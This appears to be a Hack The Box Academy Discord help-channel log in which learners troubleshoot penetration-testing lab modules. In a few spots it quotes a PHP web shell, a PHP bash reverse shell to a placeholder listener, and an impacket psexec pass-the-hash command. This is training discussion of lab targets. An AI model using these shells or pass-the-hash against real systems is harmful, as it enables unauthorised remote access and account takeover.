#modules

Making assumptions is how you miss the obvious

Got it, still my question is. If I have disabled ping using -Pn why it is still sending ICMP packets

It shouldn't be

But -A may enable things

It's why your disable flags go at the end

Hey there I'm currently working on the Vuln Assesment Modules and Im getting kinda confused on the methodology presented in the module.

It doesn't reallly make sense to me to Evaluate the risks and anticipate the potential harm that our vuln scan could cause to the company's information system (step6) AFTER performing the scan (step 5)

am I missing something here ?

Evaluate the risks of the discovered vulns

Just a small question related to the subscription: I'm planning to sub to the $8 student plan, so is it auto subscription ? or if I want I can do it manually each month?

Auto

Nvm I'm just waking up, chuck in #1234357888114364508

ah F, is it possiible to do it manually instead? I want to pay only uptil I want

just unsub righ after subbing

^

Hmm ok 👀

Monthly sub is for day x -> day x month to month so apr1 -> may1 or whatever day -> whatever day

But remember that once the subscription has expired, you will only be able to access the modules that have been completed completely.

are you saying an erratum already exists (because I can't find it ), or should I make some kind of ticket ?

Make a post there:
"Chuck it in" is an expression meaning throw or put it in

ok I thought It was a typo for "Check in "

I did not mistype

U and e are very far apart

If i had mistyped, I'd just give up on life

Fair enough

that would have been a pro gamer mistype tho

Did not expected to learn English here 🤣

Hi all working the footprinting assesment lab:

https://academy.hackthebox.com/module/112/section/1078

and running into this error:

NSOCK ERROR [4.4240s] mksock_bind_addr(): Bind to 0.0.0.0:631 failed (IOD #4495): Address already in use (98)

ive ran into this a few times when doing BOXES and not academy but i finally delved into this and it looks like i should be able to bypass this using --source-port <x> but doing that, its still returning :631 as in use... (i specified 13373)

is there ab etter way to fix this wihtout killing whatever (cups) is on that port

$ nmap -sV -sA 10.129.156.28 -g53 -Pn my nmap initially had nothing to do with that port anyways so im a little stumped... i did target that port on the TARGET (--top-ports=1000) but not sure why its trying to do that on my host, particularly with -g specified

Look at the error message. Something is already running on this port.

yes i understand the error message but not how that relates to outbound scanning

A port can only be used by one service at a time.

yeah uncertain why its using :631 locally but putting that aside for a moment, i used the --source-port option to specify a diff port anmd i still came up with the exact same error

im doinga test on a target ip, not my local ip btw in case thats unclear

but the default route 0.0.00. is specified and im uncertain whose ip that is tbh

I don't know what exactly you are trying to do, but the error message says that you tried to start a service on port 631, but it is already in use on your machine

(pwnbox or target)

I'm trying to do a simple --top-ports nmap scan -sV on a target

for the footprinting assessment

i guess i need to tcpdump a nmap scan and see if its trying to use my local ports to connect to the target or something?

it has to be local something because i terminated the pwnbox, restarted it and the scan kicked right over

Which version of nmap do you use?

nmap 7.94, on pwnbox

Hmm? It should actually be solved.
https://stackoverflow.com/questions/73671565/nmap-running-on-zenmap-7-93-nsock-error-ssl-init-helper-openssl-legacy-provider

slightly diff error message but im passed it for now, ill just have to investigate the packets its possible my CTRL+C interruption, it didnt like that

thanks for that though ill keep it in mind

I just tried it on the PwnBox without any problems. Maybe you should restart the target and the PwnBox.

Getting Started Module> Knowlege Check> When I search for exploit I don't find anything on search sploit and other websites. Using MSFconsole and selecting what should be the right exploit, the check fails. Also, I see there is a manual way to do this, but the php code doesn't match anything we have learned. I feel like this makes it hard because I am by no means a web dev or a programmer. Even using swisskyrepo I wouldn't of gotten the reverse shell via php syntax right.

This is an entry level module, there's nothing overly complex you'll be required to do and you've been shown everything in the module so far

If the check fails: are you sure it's the right exploit

Right but for me if I used the manual way to do the exploit, I only really know the website ive been provided and previous commands. The answer sheet uses something complete different. That's where I get hung up because without it I wouldn't complete this correctly (likely).

I just want to understand and learning what I'm actually doing is all :).

Then you take notes and research

Htb can't break everything down all the time. You may require external resources to understand things

The php syntax just uses system() to run a system command

So instead of using php, it runs system code

I have a OneNote pretty full of each module and have been reading on php, I just don't get how some of the commands are created for this. I do understand external resources are required here but half the battle is understanding what to look for when you are learning what it IS.

echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php
vs
||<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/PWNIP/PWNPO 0>&1'"); ?>||

$_REQUEST is specific to web stuff

typically it's either $_REQUEST[] or $_GET[]

it takes the arguments from the url ?somvar=someval

in this case it takes the "cmd" argument and runs the input from that as a system() command

https://www.php.net/manual/en/function.exec.php

https://www.php.net/manual/en/function.system.php

literally just look at the docs for php

then google from there

https://medium.com/@stefanos.kalandaridis/bash-ing-your-network-f7069ab7c5f4

consider everything inside 'exec' as running as a shell

so it's running a revshell command within the php syntax

PWNIP/PWNPO is your tun0 ip and your listening port; i can see you pulled that from the walkthrough/guide

Is there an easy way to scroll up in a terminal to see items we can no longer look at (above)? I did end up with root flag after using msfconsole.

Hey, can I dm someone on Introduction to Sliver C2 module? Can't manage to establish reverse shell via forwarded port

Hi, has anyone completed the Prompt Injection Attacks module?

In the final Skills Assessment, I managed to get the CEO banned and even obtained the admin key, but the flag still isn’t showing. Am I missing something or doing it incorrectly?

not the same problem and not sure if anyone already mentioned, but new update on kali, makes nmap return incomplete service version

Anyone that completed the DACL attacks 2 module? I am stuck on the last question of the skills assessment.

Thank you this is definitely something I need to keep in mind

We're talking about nmap -sV outputs or just returning the wrong nmap version (-v or whatever?)

can any one help with password attacks- PTT for linux the last 2 questions.

i got the ticket right but it still gives me errors i cant access julios smb share

gensec_spnego_client_negTokenInit_step: gse_krb5: creating NEG_TOKEN_INIT for cifs/dc01 failed (next[(null)]): NT_STATUS_INVALID_PARAMETER
session setup failed: NT_STATUS_INVALID_PARAMETER
it give me this

even though im using the right ticket
klist
Ticket cache: FILE:/root/krb5cc_647401106_HRJDux
Default principal: julio@INLANEFREIGHT.HTB

Valid starting Expires Service principal
10/07/2022 11:32:01 10/07/2022 21:32:01 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 10/08/2022 11:32:01

⚠️ help

Hmm, could I get a hint for the DNS-module of "footholding"? 🙂 The last question ("Find FQDN of host with IP xxx.xxx.xxx.203") ... so I'm running dnsenum with various wordlists on the ip adress of the initial dns-server (I do not know how to embed the information about the internal dns server in this query). Any help? 😄

With ligolo?

Nope, rportfwd, but nvm, resolved the issue

Is there any way to fix academy VPN constantly not working? I don't really know if that's my problem, but every like 3mins the IP of the server just keeps not responding and I can't do anything because of it.

I changed the server and the issue appears to be fixed

waisted days thinking i was the problem the VPN is the fucking problem

fuck this shit man

If you're still stuck I'll be on the pc in a few. You can DM what you know and have tried.

can anyone help where do i get LINUX01$ kerbos ticket from i dont really understand the question

the module teaches you everything you need to know to find tickets

LINUX01$ would be the machine ticket that connects it to the AD environment

Hi guys! I'm doing the Getting started module, i solved the first question and now i'm into user2 but whatever i do i can't find a way to escalate my privileges to access the flag.txt in /root, everything i try i can't move because i don't have the user2 password. The only hint i have is "don't forget to chmod" but i don't understand exactly how can i use it in this case. Sorry for the possible dumb question but i'm trying to learn as much as possible without googling solutions or using AIs

what can your user see that you think they shouldn't

sometimes a user may have more permissions to see something than they should

I can reach the flag.txt inside root but i can't open it due to permissions and i can't find a way to escalate privileges

the reading may have referred to a hidden file location such as where you'd store your id_rsa

every ssh user has one including root

just gotta list all items

Hey everyone! I’m stuck in Getting Started on Public Exploits. I viewed the hint and searched exploits in meta soloist and found an read only exploit that lets to an etc/passwd but what am I supposed to do with the etc/passwd?

maybe modify the exploit to read a different FILE

options is useful

Ah I knew it! okay

Thank you!

I'm following the module's instruction but i just can't get to it, i'm almost cooked after several hours lol

can you explain a lil more

in order for a machine to connect to a domain, it needs to be issued a ticket

any machine tickets will have the $ at the end

so; you need to find the config for how it connects to the realm

hint a tool they showcase will be useful

thanyou homie

I eventually got it, but thanks!

I did the chmod 600 part and now i have the private key id_rsa and the public key id_rsa.pub and i'm stuck in the "ssh root@10.10.10.10 -i id_rsa" part where i keep getting timed out

That's the wrong IP

Yes i used the spawned one

so it either died or you have the pwnbox spawned at the same time being on the vpn or something. if your command is timing out that indicates you can't reach the target.

I tried several times with two different spawns and i always get the timeout. IP and Port are correct, this section is making me crazy

are you on the vpn or using the pwnbox? it's something to do with your network connectivity. if you recently changed vpn servers you may need to hard refresh the page you are spawning the target on (CTRL+R)

I'm on VPN, ok i'll try one last time for today then i go to sleep lol thanks 😁

I am experiencing a delay in the recursive ffuf scan process. I have double-checked the full URL from HTB academy on the browser, but it is showing "Server Not Found." Can someone help me with this?

your hostname is incorrect

I am connect through VPN and it is working when I run http://academy.htb:PORT

from my vmware

according to the text on the page you provided it's admin.academy.htb. in your command you're just using admin.academy. in discord you say you're using academy.htb. they are all different and according to the text, you need to use admin.academy.htb. make sure to add it to your /etc/hosts file too.

It's not a VPN problem, is there a way to have more than the -Don't forget to chmod-
"hint"? I give up for today but i honestly don't know where to start tomorrow, this is the first time i can't understand what to do...

It's a network problem of some kind. You said the error was a timeout. That means the command gave up because it couldn't reach the target before the timeout timeframe.

You can terminate the target, download a fresh VPN file, maybe from another server/region, hard refresh the site with CTRL+R, then re-spawn the target and try to connect again.

you should be able to ping the target too.

Yes but every other interaction with the spawnbox worked, that's the only command that didn't work 🥲 anyway tomorrow is a new day, i'll try again, thank you very much 😁

Hello all I am stuck again on Getting Started on Public Exploits. I couldn’t get shadow so I got config but I am not sure what to do with the config. I tried logging in but it won’t allow me because of the access is denied for local host

Can any kind soul please DM me regadring help with Skills Assessment - File Upload Attacks

Any help would be appreciated 😊

not sure what part you're trying to do; but the public exploits solely deals with a public facing web app; that tells you explicitly where the flag is

Or does anyone know why I am getting a 500 in reponse?

Quick question! Could i use my Education Email Adress as my secondary email on my HTB account and still have access to Education pricing for the monthly subscription?

yes

Okay! Thank you

Hello guys i have a question, i don't know if that's the right channel or what but the main question is:
How accurate is linpeas.sh?

I'm really new and I get linpeas red and yellow over a cve but when i try to check it there is a module required for that vulnerability to be exploited, it's missing on the machine.

Does this happens or maybe i'm doing something wrong?

it's accurate to a point

but i don't recommend using it for n00bs

it throws a lot of info at you that ultimately is useless unless you really know how to exploit it

linpeas is like a car alarm that goes off when a leaf lands on the hood

Hey, I've put in a lot of time this past year into leveling up my pentesting skills. I've completed Offsec's PEN-100, and PEN-200 course. Along with Hack the Box Academy's Information Security Foundations course, both Bug Bounty Hunting and Penetration Testing job roles.

I'm currently hitting a wall. I feel like my note taking, enumeration, and understanding of fundamentals are solid. But when tackling labs or networks with multiple machines, I'm struggling to differentiate between the correct path forward, and rabbit holes.

A lot of times during enumeration, I'll find things that look like valid attack paths, sometimes even real vulnerabilities, but they turn out to be dead ends. When that happens, I end up brute forcing every interactive part of the site just to make sure I didn't overlook something. That approach eventually reveals the path forward, but it's inefficient, and slow. My pace is no where near where it should be in recognizing where to focus my efforts.

I guess my question is, would someone be willing to tell me what I'm missing or what I should be focusing on to improve?

-sV, which involves the nmap version
just pointing this because, I was redoing some old exercises, and those using this version, will have a problem finishing some modules
replace with older version or tool, or only use parrot/ htb instance

Hi Guys im preparing for CPTS and i am stuck in the attacking enterprise networks web part. Especially the cookie stealing on the support site. I can get requests to my php or pthon server if i just type the url to my server in the field that it needs to be in. But i cannot get a script to execute there. I already checked the solution tbh, bc i am stuck there for hours and cant figure it out at all. As a last resort i literally copied the solution and changed ip and port to my systems but it still doesnt work. AnyHelp would greatly be appreciated.
I also restarted everything, VPN, Lab, VM, Host. I cant figure out if i overlook something completely, the lab may be faulty or i am just on it for too long

if you're struggling in AEN, then read the section, as the module itself is a guide

if you're struggling with that then you're likely doing something wrong

hard to say without knowing. but i'm an advocate of doing that module blind ==> not reading the module nor reading the questions

Hello everyone,

I’m completely new to IT, but I’d like to learn about cybersecurity. I have a vocational diploma in digital systems, so I’m already familiar with basic concepts and feel comfortable with computers in general. However, I have no experience in cybersecurity and don’t really know where to start.

If anyone has a recommended learning path (courses, certifications, resources, hands-on projects, etc.), I’d love to hear your advice! My goal is to learn gradually and in a practical way.

Thanks in advance for your help!

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Hi guys, quick question. I have port 5621 open via nc and Im trying to redirect a vulnerable ssrf part of a website to that port however it's not giving the correct response but when I do it on port 80, it does. Anyone have any ideas why?

@pine dune which module is that regarding?

SSRF

Provide a link to it, please

https://academy.hackthebox.com/module/145/section/1300

they show it in the example with port 8000

Im trying to replicate it with port 5621 but idk if im doing somehting wrong

That's a tier 2 module, so please avoid posting screenshots with potential spoilers

sorry

You've asked your quesiton, and specified the module, so hopefully someone will be open to giving you a nudge

🙂

okay thanks man 🙂

If you still need help, send me a dm

@pine dune ^

Thank u

So I am currently on the File Upload Attacks module doing the absent Validation sub-module and I am having trouble understanding what I am doing wrong when writing the PHP script. I have tried a few different ways to output the hostname, but I dont get words, I get- nvm

LMAO I figured it out as I typed

Is there a channel I can suggest that a mistake was made on a certain question?

#1234357888114364508 <—

I don't know who created the assembly module on hack the box academy but that dude needs a raise.

Hello, so I am currently on the client-side Validation sub module in the file upload attacks module. I am attempting to modify the request as it states to create a shell on the host.
I have tried doing it as it shows a few times on the backend, but I just either get what looks like encrypted characters, or a black screen if I remove those characters from the initial request. Any help would be appreciated.

client-side section only requires you to modify the client-side validation side in the html from what i recall

Yes, which I change the file name and add in the php script in the actual request. when I try to then visit the file, rather than presenting a shell it presents a blank page.

I havent tried the other way which is front end

is the php shell expecting a request?

like ?c=<command>

May I show you the image in the module I am using as reference?

if the php code contains $_REQUEST["c"] => your call to the server must use ?c=

Ohh

$_REQUEST["param"] or $_GET["param"] require the "param" to be used in the request

so if the "param" after $_REQUEST IS "cmd" I need to use cmd?

I'm a little confused

yes

it has to exist somewhere in the request

Hi,
I have this small question regarding one command in Footprinting - DNS module.
I don't really understand the concept of using ns in a dig command as shown below:
dig ns inlanefreight.htb @10.129.14.128

What does it change to the output of a dig here?

Is it okay if I post an image from the module so I can clarify.? From the way it seems to suggest, I change the file name in the request to theFileName.php and then a few lines down also write my script, and the send it, then try to visit it.

yes

that should be fine

module is above tier 0 so careful sharing :))

yeah when I visit it, its just blank or if I dont remove the random characters, those characters are in it.

it just being blank
^

that means it uploaded and you can visit it

given your php shell you need to call that endpoint with ?cmd=<command here>

but when I visit it, its blank

ohhhh

I understand

the output depends on how the dns is set up, if it's authoritative or has special records

if you want it to run an arbitrary command you'd instead replace $_REQUEST["cmd"] with whatever system command you want

you're specifying the query type

you saying endpoint made it click I think

lets see

dig <query> domain @nameserver

but cant we just use dig -x <ip>?
first time using dig command so sorry if im totally wrong here haha

i'm sure there may be multiple ways to use dig

however the conventional format that dig uses is dig query do.main @name.server

oh okay, thanks for the clarification

NGL but the amount of information in CPTS modules is just enormous

so I retried using ?cmd=<and then a command> and each time I visit it, its still blank. I am suppose to be able to for instance put ls after ?cmd= and it should spit out contents of a directory right?

oh ffs

you don't include the <>

I know

I didnt

but yes it should; if it's not i'm assuming you did something wrong

:P

Yeah I'm at a loss. haha

try using $_GET instead of $_REQUEST

Okay.

GET worked.

Best to understand the difference to see why it works better

Yeah I am looking into it. I wonder why the lesson says to use $_REQUEST

this module is a decent showcase of the example != what you'll encounter

Very true

I got a problem in Footprinting - SMTP module with the last question;
I found the username but it says it's incorrect...
[+] 10.129.54.51:25 - 10.129.54.51:25 Users found: *****

I used metasploit to get it

question:
Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.

it is some task bug or?

Try using other tools like the nmap script or a third party script

trying it rn; Remember that some SMTP servers have higher response times now I know what they meant here... Sooooo slow

but I'm wondering why MS doesnt work here

also make sure you're using the wordlist from the resources

yea, im using it

@waxen totem found it...

gonna write down this command for future; sometimes I love that Academy doesn't give all commands straight up, forcing us to research it ourselves and LEARN but sometimes it makes me maaaad haha

btw MS works too but I had to change the wordlist to the one provided in resources (and its kinda faster than the command I used)

Hi can anyone give me a hint on File Upload Assesment.

I already have the extension and content type and found the directory from xxe attack to get from source code.

When uploading the final shell code it still says Only images allowed and i changed everything in repeater even added Magic bytes (GIF8)

I did also see in forums of someone using a hex editor and that as well did not work

you can try adding double extension but I may be wrong (havent done this task yet)

i did that as well

i checked (fuzzed) for both black and white listed as well for content type filters.

if it says "Only images allowed" then its most likely that ur file has to have the image extension but I dont want to give the wrong idea cuz like I said I havent done that task yet

but keep researching, you'll find something useful in no time!

I have been all day lol

earlier i couldnt find the source code but i took a break and i found it doing the same method idk how now it worked.

but now i cant get pass this issue.

As for hex editor i used a JPEG signature, but i guess the PHP code that follows immediately after, the system may detect it as suspicious. But i am not sure if this is even the issue.

have you tried using a real image

i just used exiftool

on repeater it gives me a response and does not say "only images allowed" but when i go to the file it says only images are allowed again.

i need to scan my system for all listening services across all inferfaces, im having trouble and chatgpt cant save me

which module and section?

Hey
I have never used hack the box
Can anyone tell me if THM and HTB are same or different??

I got it to work but now stuck on parameter commands. I tried ?cmd= cat ../../../../flag.txt as well as cat flag.txt. Also cd ../../../../;ls -la but didn’t see anything interesting

Any tips/hints?

this is still for Skills Assessment - File Upload Attacks

is Skills Assessment - File Upload Attacks broken? I can upload a .svg file with the XXE payload for upload.php but it wont show anything in the source code

Dm what payload you used bc it was like that for me too

will do, ty

oop sry, i didnt recieve ping, its linux fundementals (18 )sec 80

sysctl or netstat?

sysctl is responsible for the services on the machine
netstat is used to get the network status, usually ports and interfaces on the machine

which one do you think you should use? 👀

also provide the section name not just the number

ik netstat, but ive tried everything that im questioning myself

😭

its section "filtr contents"

look at what's specified in (the parenthesis) after the question

yh, ss -tuln | grep -c 'LISTEN' is responding 20, i thought -tuln would respond with all innerfaces

yes but how many of those are localhost?

it wants the ones that AREN'T localhost

ohh

~~ngl could've been worded better ~~

thanks man

yh wording confused tf outtam e

ipv6 too or just ipv4?

Hey guys! I just want to confirm one thing. I'm doing the web attack module and for the remote code execution with XXE exercise I'm supposed to launch a python web server on my VM. I just want to confirm is it safe to do so? Can a malicious actor connect to my VM or home network if I do "sudo python3 -m http.server 80" ? Are there any risks or totally safe?

Read what's in the parenthesis again...

okkk

no one can connect to your home network without being in range and having the wifi password for it

it's safe (unless you've done some port-forwarding on your router and have very specific configs for your VM network)

Okay, thanks guys! That is good to know. I was worried the port 80 will open up for everyone on the internet and everyone and their mom will try to connect to my IP through port 80. 😄

Be glad we ran out of ips early on and they had to invent NAT

massive security boost ngl

what abt with remote management?

One more small question
If say, I pay my $8 and then unsub, will my subscription be valid for that month?

For the htb academy student plan

for most services yes, check tos when u agree. chatgpt is handy

same thing, VPN is the exception

I want to explore and see first if I'm comfortable with the content then I'll continue with the sub

still can't connect to your home network bruh

And if I can handle ctps I could go ahead with that then

contact support for all things related to subscriptions

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

ok

"Need to speak to a person?" ai is too powerful

AI isn't very smart

considering it couldnt find what i was doing wrong earlier. i agree

https://help.hackthebox.com/en/articles/5720974-academy-subscriptions
I wonder if this article is still valid

Scrolling down, you can see your current plan. At the end of the page, you can simply click the Cancel Subscription option, which will keep your current month's or year's subscription active and running, but will prevent further automatic payments from going out from your default registered payment method.

yh so it should cancel after free trial,

otherwise you can always tell your card not to give em mony

academy doesn't have any free trials... does it?

~~and don't say T0 modules are free trials, they aren't ~~

ok, and if I cancel the sub then it should be valid for the next 30 days right ?

contact support for anything related to subscriptions

ok

isnt it dont spoil over t0?

yeah don't spoil anything over t0 cos they ain't free, also regardless of tier don't share answers either.

kk can i dm u?

what for?

future problems etc etc. also i might have one now..

1s

future problems, no I will not always be available(ask when they happen, I'll help if I'm active), right now, I wanna know the context

same question, however i didnt know if i could post possible answers here?

you can post command results without the answers in it

ah F support is closed till tomorrow

I want to know if someone tried to cancel the subscription right after paying

Why couldn't you? You've paid for the whole month, yeah? Also, if you want to be sure. Why don't you just cancel the subscription a day before the month has passed?

oh right I can also do that

Hello can someone help me , i'm in wordpress skill assements on hacthebox academy , i can't launch a wpscan ?

do you have it installed?

https://wpscan.com/how-to-install-wpscan/

Yes i have , i also got this error "Scan Aborted: The remote website is up, but does not seem to be running WordPress."

And i can't access the httos servers i have this error "SSL_ERROR_RX_RECORD_TOO_LONG"

nice, decided to enroll in student plan, will complete the pen tester path first 😅
decided to let it go on for 3 odd months then unsub

could my error have been i was given duplicate ports? i got annoyed and guessed the answer, however i just realised i got some duplicate ports when not using | wc -l to auto count for me

Well, the module also introduces how to deal with that

Hey guys , super sttuck on AD Enumeration & Attacks - Skills Assessment Part II. Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host. I've Obtained the C*** users PW and generic all rights. But cannot abuse ACL / Admin hash obtained from SQL01 doesnt work with MS01. Would much appreciate some help

Feel free to DM me. It has been a while since I did that but still have my notes so I'll be able to provide some help :)

awesome thank you!

Hello. I'm having trouble with the new android fundamentals module. Section android emulators, question Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? I have created the correct AVD but it seems like the build number is incorrect.

Hey all, I would like to ask
for AD Trust Attacks Module
Lesson (Unconstrained Delegation)

Currently i am attempting to spin uip the box. However everytime I authenticate I would reciveve the error 'ERRCONNECTLOGON_FAILURE

If anyone has ever done this module and would love to point me on to the right direction would be greately appreciated 🙂

Disregard this issue, it seems like it was vpn related. I chaged vpn and sorta worked

Nvm I solved it

Lmao

👍

sorry not related to modules, more to AttackBox VM, not sure if its the right place to ask, but anyone have this issue? i dont have any active AttackBox VM at the moment

Hi,
I'm currently doing the module "Applications of AI in InfoSec"

For the Network Anomaly Detection, when I'm submitting the model file for evaluation, I got the error "Invalid model file"

I validated the upload code by uploading the spam classifier (to the right port), and it works

I also tried to load the Network anomaly model and use it, it also works, so the joblib.dump() seems ok

Did I miss something?

How do I fix this output in a windows shell

Hello

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

@limber wedge ^

that's just kinda normally how weirdly it outputs

In the Linux Local Privilege Escalation - Skills Assessment module there is a note that says:

Note: There is a way to obtain a shell on the box instead of using the SSH credentials if you would like to make the scenario more challenging. This is optional and does not award more points or count towards completion.

Is there someone who figured out how to get a foothold without using SSH?

yes contacted support, i guess ill wait for them, thank you !

Hi guys, i'm doing the pentest introduction course, i'm on the Nibble machine and i'm following instructions but when i try to execute the whatweb <ip/nibbleblog> i get the ReadTimeout error. I googled and there's another guy that had the same problem and he supposed that it was due to Nibbles beeing part of the vip subscription, is this the reason? It's not a problem by my side

If i execute whatweb with IP only it works, the problem is when i try to access /nibbleblog and i can't reach it on the browser too

@fathom pendant you never sleep, right? hahah

the nibbles section on getting started module is slightly different than the box but not being able to access the endpoint is odd (it has nothing to do with subscription level)

try changing vpn regions/respawning target

I also tried to click directly on the link from the redirectLocation of the whatweb scan so the url should be correct, I'll try your suggestion and let it know, thank you!

It's weird because the initial page where there's the Hello World string works

on the logrotate part of linux privesc, why is the log not rotating?

its in the Footprinting - SNMP module last question

that's not how snmpwalk works

I used snmpwalk to find the script

then I thought I can use snmpget to get the content of it

lol also: you are grepping and it is returning what you're grepping maybe you need more Context After the grep

grep is a powerful tool if you just read the docs

update the log file and it'll rotate

consider each .n it's own output line getting more specific i.e. 1.3.6.0.1 and 1.3.6.0.2 refer to the same 1.3.6.0 object but more specific at .1 and .2

i did, and then it created a new file. I thought it was supposed to give me a shell

oh lol nvm, immediately after sendin that i got root. then the shell went away before i could cat the flag.

i would focus on trying to grab the file instead, shells with this method are highly unstable

DAMN, I love you!!!

thanks A LOT!!!

I got flag, thank you! I dont remember reading anything about how to update the log in the section.

reading up on OIDs is useful for snmp stuff

Who here likes powershell ?

who doesn't LOL

I was being ironic, we actually support that?

I guess we have too

I hate learning powershell but oh boy do i like what you can do with it.

so i am on Password attack lab-hard. Was able to get the hashes from the vhd file. but none of the wordlist i have tried so far cracked Administrator hash. Can i get a hint in the right direction please

rockyou or mutated should work

└──╼ $john hashes_to_crack.txt --format=nt --wordlist=/usr/share/wordlists/rockyou.txt found nothing

if not: you don't need a password to log into windows, sometimes the hash is all you need

If you need to use a mutated password im pretty sure the 64 top rules in hashcat is a good one for mutating pw lists for htb

reverse psycology 💀
never actually tried using the hash as the password but when i think about it , it does make sense

yeah its weird, i was doing a box once and i was stumped after not being able to crack the hash, eventually i looked up the next step in the walkthrough and was so annoyed that i just had to use the hash.

I changed my payload, it fixed that issue

do u by chance remember the box name?

yep most tools support it; freerdp uses /H: i think

but there is no practical use with it right ? i mean like irl who would keep their NTLM hash itself as their password

uhhhhh, idk. I remember one of the more recent active directory ones i did was cicada but idk for sure if that was it.

you're thinking incorrectly about this

with Windows: the hash is the same as the password, essentially

ye i too had a bad feeling abt tht

it's not that their password is the hash, it's just the way the login works

oh wait

the hash is just a hashed version of the pw

u mean if i put hash it is treated as a password itslef in windows?

like rather than password123 if i input the hash of it , windows treat it the same way? @fathom pendant

I havent really touched windows machines yet, been mostly working on Linux.

ok so i tried to use the CMD as Administrator and tried the hash as the passwd that didnt work. so we must have to import psexec on the box to get this to work or something

so im doing the misc linux priv esc and i ended up getting root with the nfs but i cant find the flag. I found 4 flags on the system and none are the right ones

not necessarily, it's just how it's shipped off

You should check the /etc/exports file

you don't use /p: to pass the hash

thank you

an ntlm hash is in the format LM:NT, typically the NT portion is used

for UAC, you'd need the pw

but you can just... log in as the admin directly

instead of dealing with UAC/importing tools

shipped off? you mean how windows handles authentication? like, when I enter a password (password123) does windows immediately compare it to the stored hash or does it first hash my input and then check if it matches the stored hash?

when you input the password it's hashed and compared

https://learn.microsoft.com/en-us/windows-server/security/kerberos/passwords-technical-overview#how-passwords-work-in-windows

basically how any password authentication should work is that the password itself isn't stored, rather the hash

oh ok got it so if i have the NT hash i can login as admin without worying about the UAC restrictions

is this a common practice while doing ctf or real life pentesting

yes

lol

not niche at all

ohhhh
wow

SUPER common lol

😢

but thanks a lot for the valuable info u guys shared

i learned a lot bcz of this convo

it's passed off differently with PTH techniques

basically the way the PTH code works is it skips the password hashing part and says "hey look at this and compare"

oh so which is the safer method?

you don't use PTH for standard login

got it

not sure what you mean "safer"

you use your password all the time to log in

an attacker would use the hash because the authentication mechanism allows for it

python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes :whwhwhwhwhhw Administrator@10.129.61.157

i have tried this aswell as xfreerdp aslos from runas Administrator cmd i just dont get it

ok understood,
safer was in terms as PTH bypasses the usual pass hashing was it inherently less secure

but i understand now

it doesnt make it less secure

thanks 💯

u sure the NT part is correct?

and while searching up on google, i found psexec needs SMB enabled

maybe try wmiexec

Have you passed the hash with cme? May have the wrong hash or trying it against the wrong host

or try using evil winrm

I need help with mssql attacks, i need resources, what happened in attack common services hard lab is abusing

Your daily take care message

Hello everyone I hope you have an amazing day today staying safe, drinking water, staying hydrated, eat a snack, take a shower n take your meds if you need to.

And remember that someone is happy that you exist and I’m so proud of you all. Stay amazing y’all, take breaks when needed and take care of yourself first. Love y’all and stay awesome

Hi, I'm doing the backup and restore page within linux fundamentals and it is asking me for the htb user password, what is this for default?

Okay nevermind, I changed the command because I am just copying files to a backup on the same system just to test the command. I am still curious as to the default password for the htb user for future use?

I realized it was a whole technique like the impersonating thing, but with mssql right?

@fresh wedge please avoid sharing things like hashes

:)

Hello im trying to use kerbrute to get some valid users
But kerbrute gets stuck when using jsmith.txt
But is doing well when using a small list
How can i resolve this?

And why it happens?

Hello, i am having an issue with a module. I wanted to check here first before i hit up support. Is anyone avialable?

ask your question, someone here might be able to help

Thank you! On AS-REPRoasting Challenge questions (Kerberos Attacks) It says to login with a specific user and pass. Each time I try to log in it ives me a bad user/pass. I've tried with local and domain user once i go to the login screen. Just curious if i am missing something here

Never mind. After the 3rd reset it finally worked

I just tested this and it worked for me. Are you sure you're connecting to the right target? Try with xfreerdp3 or something.

IYes i was connected to the right target. not sure what happen. I even changed vpns, but it worked after the 3rd reset. Thanks a bunch for trying as well. I appreciate it

You deserve a raise Nuts

Or a few more nuts

?

What do you mean? What you need to do is in the Atacking SQL Databases module from Attacking Common Services right?

the mssql attack in attack common service hard lab

Yeah what is the problem?

i wanted to know the technique exactly in the conclusion what are you trying to do, it was impersonating users via mssql right?

Yes

damn, the technique is really cool but was real pain

took me a lot of time

Yeah the sqlcmd program is a bit goofy

The SPN Jacking module had problems getting the NTLM hash of the user in the context of which I should abuse access in the last task. I used different techniques, but the module clearly gave a hint that I should use the Shadow Credentials technique. I used the Whisker tool from Linux and Windows, but I get the same problem [X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP.

https://academy.hackthebox.com/module/112/section/1079

im getting a permissions denied error when trying to cd into the identified mount location from enumeration... it mounted succesfully but i cant access it... is this not the way forward?

You don't need to use shadow credentials for SPN jacking part of DACL 2... you can do what's in the section

im going back over my notes and the associated module but not seeing anything in particular

can i write to you in dm?

sure

Did you go in as root?

like uh sudo mount? if so then yess

Cd

i tried sudo cd and it gave me some error i didnt note at the time let me try it again

i also mounted it in ~/nfs

should i have mounted it in /mnt/nfs or similar?

Nah

Is it the nobody group?

yes funnily enough sudo ls ~/nfs is showing files

let me try the cd again its possible i ... mispelled? it?

unlikely but lets see

switch to root

is that gonna be sudo -l in this instance?

er sudo -i? or whatever it is?

or su root?

i never know when to use what

su root, sudo su

oh gosh

So whats going on here? is nobody and nogroup actual users/groups and thats causing the conflict?

i thought those were globs for whatever for anonymous?

I think it has something to do with root squash but not 100% sure

thanks that was lost on me

👋 Last night I completed Starting Point. This morning I spun up OpenVPN Initialization Sequence Completed and I cannot ping the server, I get request timeout. I tried Pwnbox and I'm getting the same thing. I've tried restarting my computer. I've tried using both my wifi and tethering to my phone. I'm not sure what else I should be checking here.

Did you start the target?

Please forgie the question. are you trying to ping a windows host?

I've tried 3 different targets now.

Looks like I can't upload screenshots here.

https://app.hackthebox.com/machines/Cap
Displays Target IP Address 10.10.10.245
OpenVPN displays Initialization Sequence Completed
and pinging gives

ping 10.10.10.245
PING 10.10.10.245 (10.10.10.245): 56 data bytes
Request timeout for icmp_seq 0
Request timeout for icmp_seq 1
^C```

Is that a starting point machine?

Starting point and the other machines have different vpns

I feel like I'm experiencing multiple issues 😓

